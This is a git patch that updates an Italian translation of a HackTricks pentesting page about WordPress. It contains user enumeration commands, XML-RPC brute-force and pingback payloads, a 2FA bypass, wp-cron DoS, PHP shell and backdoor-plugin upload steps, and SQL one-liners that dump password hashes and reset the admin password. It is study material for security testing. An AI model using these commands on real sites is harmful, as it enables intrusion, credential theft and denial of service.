From 7e08ffa2832f28e6fdffef2792b3f01544ef3ead Mon Sep 17 00:00:00 2001 From: Translator Date: Sat, 27 Apr 2024 13:38:59 +0000 Subject: [PATCH] Translated ['network-services-pentesting/pentesting-web/wordpress.md'] t --- .../pentesting-web/wordpress.md | 114 +++++++++--------- 1 file changed, 58 insertions(+), 56 deletions(-) diff --git a/network-services-pentesting/pentesting-web/wordpress.md b/network-services-pentesting/pentesting-web/wordpress.md index be1378c20..a0194fd03 100644 --- a/network-services-pentesting/pentesting-web/wordpress.md +++ b/network-services-pentesting/pentesting-web/wordpress.md @@ -2,30 +2,30 @@
-Impara l'hacking AWS da zero a eroe con htARTE (Esperto Red Team AWS di HackTricks)! +Impara l'hacking AWS da zero a ero con htARTE (Esperto Red Team AWS di HackTricks)! Altri modi per supportare HackTricks: * Se vuoi vedere la tua **azienda pubblicizzata su HackTricks** o **scaricare HackTricks in PDF** Controlla i [**PIANI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)! * Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com) -* Scopri [**La Famiglia PEASS**](https://opensea.io/collection/the-peass-family), la nostra collezione di [**NFT esclusivi**](https://opensea.io/collection/the-peass-family) +* Scopri [**La Famiglia PEASS**](https://opensea.io/collection/the-peass-family), la nostra collezione di esclusive [**NFT**](https://opensea.io/collection/the-peass-family) * **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Condividi i tuoi trucchi di hacking inviando PR a** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos di github.
-
+
\ -Usa [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) per creare e **automatizzare flussi di lavoro** supportati dagli strumenti della comunità più avanzati al mondo.\ +Usa [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) per costruire facilmente e **automatizzare flussi di lavoro** supportati dagli strumenti della comunità più avanzati al mondo.\ Ottieni l'accesso oggi: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ## Informazioni di Base -I file **caricati** vanno in: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`\ -I **file dei temi possono essere trovati in /wp-content/themes/**, quindi se modifichi qualche php del tema per ottenere RCE probabilmente userai quel percorso. Ad esempio: Utilizzando il **tema twentytwelve** puoi **accedere** al file **404.php** in: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\ +I file **caricati** vanno a: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`\ +I file dei **temi possono essere trovati in /wp-content/themes/**, quindi se modifichi qualche php del tema per ottenere RCE probabilmente userai quel percorso. Ad esempio: Utilizzando il **tema twentytwelve** puoi **accedere** al file **404.php** in: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\ **Un'altra URL utile potrebbe essere:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) In **wp-config.php** puoi trovare la password di root del database. @@ -42,7 +42,7 @@ Percorsi di accesso predefiniti da controllare: _**/wp-login.php, /wp-login/, /w * `/wp-admin/wp-login.php` * `/login.php` * `/wp-login.php` -* `xmlrpc.php` è un file che rappresenta una funzionalità di WordPress che consente di trasmettere dati con HTTP agendo come meccanismo di trasporto e XML come meccanismo di codifica. Questo tipo di comunicazione è stato sostituito dall'[API REST](https://developer.wordpress.org/rest-api/reference) di WordPress. +* `xmlrpc.php` è un file che rappresenta una funzionalità di WordPress che consente di trasmettere dati con HTTP agendo come meccanismo di trasporto e XML come meccanismo di codifica. Questo tipo di comunicazione è stato sostituito dalla [API REST](https://developer.wordpress.org/rest-api/reference) di WordPress. * La cartella `wp-content` è la directory principale dove vengono memorizzati i plugin e i temi. * `wp-content/uploads/` È la directory dove vengono memorizzati i file caricati sulla piattaforma. * `wp-includes/` Questa è la directory dove sono memorizzati i file core, come certificati, font, file JavaScript e widget. @@ -55,9 +55,9 @@ Percorsi di accesso predefiniti da controllare: _**/wp-login.php, /wp-login/, /w ### Permessi Utenti * **Amministratore** -* **Editore**: Pubblica e gestisce i propri e gli altri post +* **Editore**: Pubblica e gestisce i suoi e gli altri post * **Autore**: Pubblica e gestisce i propri post -* **Contributore**: Scrive e gestisce i propri post ma non può pubblicarli +* **Contributore**: Scrive e gestisce i suoi post ma non può pubblicarli * **Sottoscrittore**: Sfoglia i post e modifica il proprio profilo ## **Enumerazione Passiva** @@ -74,15 +74,15 @@ curl https://victim.com/ | grep 'content="WordPress' ``` * `meta name` -![](<../../.gitbook/assets/image (343).png>) +![](<../../.gitbook/assets/image (1108).png>) * File di collegamento CSS -![](<../../.gitbook/assets/image (344).png>) +![](<../../.gitbook/assets/image (530).png>) * File JavaScript -![](<../../.gitbook/assets/image (346).png>) +![](<../../.gitbook/assets/image (521).png>) ### Ottenere Plugin @@ -90,6 +90,8 @@ curl https://victim.com/ | grep 'content="WordPress' ```bash curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2 ``` +{% endcode %} + ### Ottenere Temi {% code overflow="wrap" %} @@ -98,17 +100,17 @@ curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-conten ``` ### Estrarre versioni in generale -{% code overflow="wrap" %} +{% endcode %} ```bash curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2 ``` {% endcode %} -
+
\ -Usa [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) per creare facilmente e **automatizzare flussi di lavoro** supportati dagli strumenti della community **più avanzati al mondo**.\ +Usa [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) per creare facilmente e **automatizzare flussi di lavoro** supportati dagli strumenti della community **più avanzati al mondo**.\ Ottieni l'accesso oggi: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} @@ -121,7 +123,7 @@ Probabilmente non sarai in grado di trovare tutti i Plugin e Temi possibili. Per ### Utenti -**ID Brute** +**Forza ID** Puoi ottenere utenti validi da un sito WordPress forzando gli ID degli utenti: ``` @@ -131,7 +133,7 @@ Se le risposte sono **200** o **30X**, significa che l'id è **valido**. Se la r **wp-json** -Puoi anche provare a ottenere informazioni sugli utenti effettuando una query: +Puoi anche provare a ottenere informazioni sugli utenti interrogando: ``` curl http://blog.example.com/wp-json/wp/v2/users ``` @@ -139,13 +141,13 @@ Un altro endpoint `/wp-json/` che può rivelare informazioni sugli utenti è: ``` curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL ``` -Questo endpoint espone solo gli utenti che hanno pubblicato un post. **Saranno fornite solo informazioni sugli utenti che hanno questa funzionalità abilitata**. +Nota che questo endpoint espone solo gli utenti che hanno pubblicato un post. **Saranno fornite solo informazioni sugli utenti che hanno questa funzionalità abilitata**. -Inoltre, nota che **/wp-json/wp/v2/pages** potrebbe rivelare gli indirizzi IP. +Nota anche che **/wp-json/wp/v2/pages** potrebbe rivelare gli indirizzi IP. #### Enumerazione dei nomi utente di accesso -Quando si accede a **`/wp-login.php`**, il **messaggio** è **diverso** se il **nome utente indicato esiste o meno**. +Quando si accede a **`/wp-login.php`** il **messaggio** è **diverso** se il **nome utente indicato esiste o meno**. ### XML-RPC @@ -164,7 +166,7 @@ Per verificare se è attivo, prova ad accedere a _**/xmlrpc.php**_ e invia quest **Bruteforce delle credenziali** -**`wp.getUserBlogs`**, **`wp.getCategories`** o **`metaWeblog.getUsersBlogs`** sono alcuni dei metodi che possono essere utilizzati per forzare le credenziali. Se riesci a trovarne uno, puoi inviare qualcosa del genere: +**`wp.getUserBlogs`**, **`wp.getCategories`** o **`metaWeblog.getUsersBlogs`** sono alcuni dei metodi che possono essere utilizzati per forzare le credenziali. Se riesci a trovarne uno qualsiasi, puoi inviare qualcosa del genere: ```markup wp.getUsersBlogs @@ -176,9 +178,9 @@ Per verificare se è attivo, prova ad accedere a _**/xmlrpc.php**_ e invia quest ``` Il messaggio _"Nome utente o password non corretti"_ all'interno di una risposta con codice 200 dovrebbe apparire se le credenziali non sono valide. -![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png>) +![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>) -![](<../../.gitbook/assets/image (102).png>) +![](<../../.gitbook/assets/image (718).png>) Utilizzando le credenziali corrette è possibile caricare un file. Nella risposta apparirà il percorso ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982)) ```markup @@ -210,18 +212,18 @@ Utilizzando le credenziali corrette è possibile caricare un file. Nella rispost ``` -Inoltre c'è un **modo più veloce** per forzare le credenziali usando **`system.multicall`** poiché è possibile provare diverse credenziali nella stessa richiesta: +Anche c'è un **modo più veloce** per forzare le credenziali usando **`system.multicall`** poiché è possibile provare diverse credenziali nella stessa richiesta: -
+
**Bypass 2FA** -Questo metodo è pensato per i programmi e non per gli esseri umani, ed è obsoleto, quindi non supporta il 2FA. Quindi, se si hanno credenziali valide ma l'ingresso principale è protetto dal 2FA, **potresti riuscire ad abusare di xmlrpc.php per effettuare il login con tali credenziali eludendo il 2FA**. Nota che non sarai in grado di eseguire tutte le azioni che puoi fare tramite la console, ma potresti comunque riuscire ad ottenere l'RCE come spiega Ippsec in [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s) +Questo metodo è pensato per i programmi e non per gli esseri umani, ed è obsoleto, quindi non supporta il 2FA. Quindi, se hai credenziali valide ma l'ingresso principale è protetto dal 2FA, **potresti riuscire ad abusare di xmlrpc.php per effettuare il login con quelle credenziali eludendo il 2FA**. Nota che non sarai in grado di eseguire tutte le azioni che puoi fare tramite la console, ma potresti comunque riuscire ad ottenere l'esecuzione remota del codice come spiega Ippsec in [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s) **DDoS o scansione delle porte** -Se riesci a trovare il metodo _**pingback.ping**_ nell'elenco, puoi far inviare a Wordpress una richiesta arbitraria a qualsiasi host/porta.\ -Questo può essere utilizzato per far sì che **migliaia** di **siti Wordpress** **accedano** a una **posizione** specifica (causando un **DDoS** in quella posizione) oppure puoi usarlo per far sì che **Wordpress** **scansioni** una rete interna (puoi indicare qualsiasi porta). +Se riesci a trovare il metodo _**pingback.ping**_ nell'elenco, puoi fare in modo che Wordpress invii una richiesta arbitraria a qualsiasi host/porta.\ +Questo può essere utilizzato per chiedere a **migliaia** di **siti** Wordpress di **accedere** a una **posizione** specifica (causando così un **DDoS** in quella posizione) oppure puoi usarlo per fare in modo che **Wordpress** **scansioni** una rete interna (puoi indicare qualsiasi porta). ```markup pingback.ping @@ -247,11 +249,11 @@ Dai un'occhiata all'uso di **`system.multicall`** nella sezione precedente per i ``` -![](<../../.gitbook/assets/image (103).png>) +![](<../../.gitbook/assets/image (107).png>) ### wp-cron.php DoS -Questo file di solito si trova sotto la radice del sito Wordpress: **`/wp-cron.php`**\ +Questo file di solito esiste sotto la radice del sito Wordpress: **`/wp-cron.php`**\ Quando questo file viene **accesso** viene eseguita una **query** MySQL "**pesante**, quindi potrebbe essere utilizzato dagli **attaccanti** per **causare** un **DoS**.\ Inoltre, per impostazione predefinita, `wp-cron.php` viene chiamato ad ogni caricamento della pagina (ogni volta che un client richiede una qualsiasi pagina di Wordpress), il che su siti ad alto traffico può causare problemi (DoS). @@ -263,13 +265,13 @@ Prova ad accedere a _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk Questa è la risposta quando non funziona: -![](<../../.gitbook/assets/image (184) (1).png>) +![](<../../.gitbook/assets/image (362).png>) ### SSRF {% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %} -Questo strumento controlla se il **methodName: pingback.ping** e per il percorso **/wp-json/oembed/1.0/proxy** esistono e, se sì, cerca di sfruttarli. +Questo strumento controlla se il **methodName: pingback.ping** e per il percorso **/wp-json/oembed/1.0/proxy** e se esistono, cerca di sfruttarli. ### Strumenti Automatici ```bash @@ -277,17 +279,17 @@ cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x6 wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs) #You can try to bruteforce the admin user using wpscan with "-U admin" ``` -
+
\ -Utilizza [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) per creare facilmente e **automatizzare flussi di lavoro** supportati dagli strumenti della community **più avanzati al mondo**.\ +Usa [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) per creare facilmente e **automatizzare flussi di lavoro** supportati dagli strumenti della community **più avanzati al mondo**.\ Ottieni l'accesso oggi: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ## Ottieni l'accesso sovrascrivendo un bit -Più che un vero attacco, si tratta di una curiosità. Nel CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) potevi invertire 1 bit in qualsiasi file di Wordpress. Quindi potevi invertire la posizione `5389` del file `/var/www/html/wp-includes/user.php` per annullare l'operazione NOT (`!`). +Più che un vero attacco, questa è una curiosità. Nel CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) potevi invertire 1 bit da qualsiasi file di wordpress. Quindi potevi invertire la posizione `5389` del file `/var/www/html/wp-includes/user.php` per annullare l'operazione NOT (`!`). ```php if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) { return new WP_Error( @@ -298,15 +300,15 @@ return new WP_Error( Aspetto → Editor del tema → Modello 404 (a destra) -Modifica il contenuto per inserire uno shell php: +Modificare il contenuto per inserire uno shell php: -![](<../../.gitbook/assets/image (21) (1) (1).png>) +![](<../../.gitbook/assets/image (381).png>) -Cerca su internet come puoi accedere a quella pagina aggiornata. In questo caso devi accedere qui: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) +Cercare su internet come accedere a quella pagina aggiornata. In questo caso devi accedere qui: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) ### MSF -Puoi utilizzare: +Puoi usare: ``` use exploit/unix/webapp/wp_admin_shell_upload ``` @@ -319,27 +321,27 @@ use exploit/unix/webapp/wp_admin_shell_upload Potrebbe essere possibile caricare file .php come plugin.\ Crea il tuo backdoor php utilizzando ad esempio: -![](<../../.gitbook/assets/image (407).png>) +![](<../../.gitbook/assets/image (180).png>) Quindi aggiungi un nuovo plugin: -![](<../../.gitbook/assets/image (409).png>) +![](<../../.gitbook/assets/image (719).png>) Carica il plugin e premi Installa ora: -![](<../../.gitbook/assets/image (411).png>) +![](<../../.gitbook/assets/image (246).png>) Clicca su Procedi: -![](<../../.gitbook/assets/image (412).png>) +![](<../../.gitbook/assets/image (67).png>) Probabilmente questo non farà nulla apparentemente, ma se vai su Media, vedrai il tuo shell caricato: -![](<../../.gitbook/assets/image (413).png>) +![](<../../.gitbook/assets/image (459).png>) Accedici e vedrai l'URL per eseguire il reverse shell: -![](<../../.gitbook/assets/image (414).png>) +![](<../../.gitbook/assets/image (1003).png>) ### Caricamento e attivazione di plugin dannosi @@ -355,7 +357,7 @@ Questo metodo coinvolge l'installazione di un plugin dannoso noto per essere vul * Il framework Metasploit fornisce uno sfruttamento per questa vulnerabilità. Caricando il modulo appropriato ed eseguendo comandi specifici, può essere stabilita una sessione meterpreter, concedendo l'accesso non autorizzato al sito. * Si nota che questo è solo uno dei molti metodi per sfruttare un sito WordPress. -Il contenuto include aiuti visivi che rappresentano i passaggi nel dashboard di WordPress per l'installazione e l'attivazione del plugin. Tuttavia, è importante notare che sfruttare vulnerabilità in questo modo è illegale ed etico senza l'autorizzazione adeguata. Queste informazioni dovrebbero essere utilizzate in modo responsabile e solo in un contesto legale, come i test di penetrazione con autorizzazione esplicita. +Il contenuto include aiuti visivi che rappresentano i passaggi nel dashboard di WordPress per l'installazione e l'attivazione del plugin. Tuttavia, è importante notare che sfruttare le vulnerabilità in questo modo è illegale ed etico senza un'autorizzazione adeguata. Queste informazioni dovrebbero essere utilizzate in modo responsabile e solo in un contesto legale, come il penetration testing con esplicita autorizzazione. **Per passaggi più dettagliati controlla:** [**https://www.hackingarticles.in/wordpress-reverse-shell/\*\***](https://www.hackingarticles.in/wordpress-reverse-shell/) @@ -365,7 +367,7 @@ Estrai nomi utente e password: ```bash mysql -u --password= -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;" ``` -Cambia la password dell'amministratore: +Cambia password amministratore: ```bash mysql -u --password= -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;" ``` @@ -389,30 +391,30 @@ Inoltre, **installa solo plugin e temi WordPress affidabili**. ### **Altre Raccomandazioni** -* Rimuovi l'utente **admin** predefinito -* Utilizza **password sicure** e **2FA** -* **Rivedi periodicamente** i permessi degli utenti +* Rimuovi l'utente predefinito **admin** +* Utilizza **password robuste** e **2FA** +* Rivedi periodicamente i **permessi** degli utenti * **Limita i tentativi di accesso** per prevenire attacchi di Forza Bruta * Rinomina il file **`wp-admin.php`** e permetti l'accesso solo internamente o da determinati indirizzi IP. -
+
\ -Utilizza [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) per creare e **automatizzare flussi di lavoro** con gli strumenti comunitari più avanzati al mondo.\ -Ottieni l'accesso oggi: +Utilizza [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) per creare e **automatizzare flussi di lavoro** con strumenti comunitari tra i più avanzati al mondo.\ +Ottieni l'Accesso Oggi: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)! +Impara l'hacking di AWS da zero a esperto con htARTE (HackTricks AWS Red Team Expert)! Altri modi per supportare HackTricks: * Se desideri vedere la tua **azienda pubblicizzata su HackTricks** o **scaricare HackTricks in PDF** controlla i [**PIANI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)! * Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com) * Scopri [**The PEASS Family**](https://opensea.io/collection/the-peass-family), la nostra collezione esclusiva di [**NFT**](https://opensea.io/collection/the-peass-family) -* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Condividi i tuoi trucchi di hacking inviando PR a** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud). +* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Condividi i tuoi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.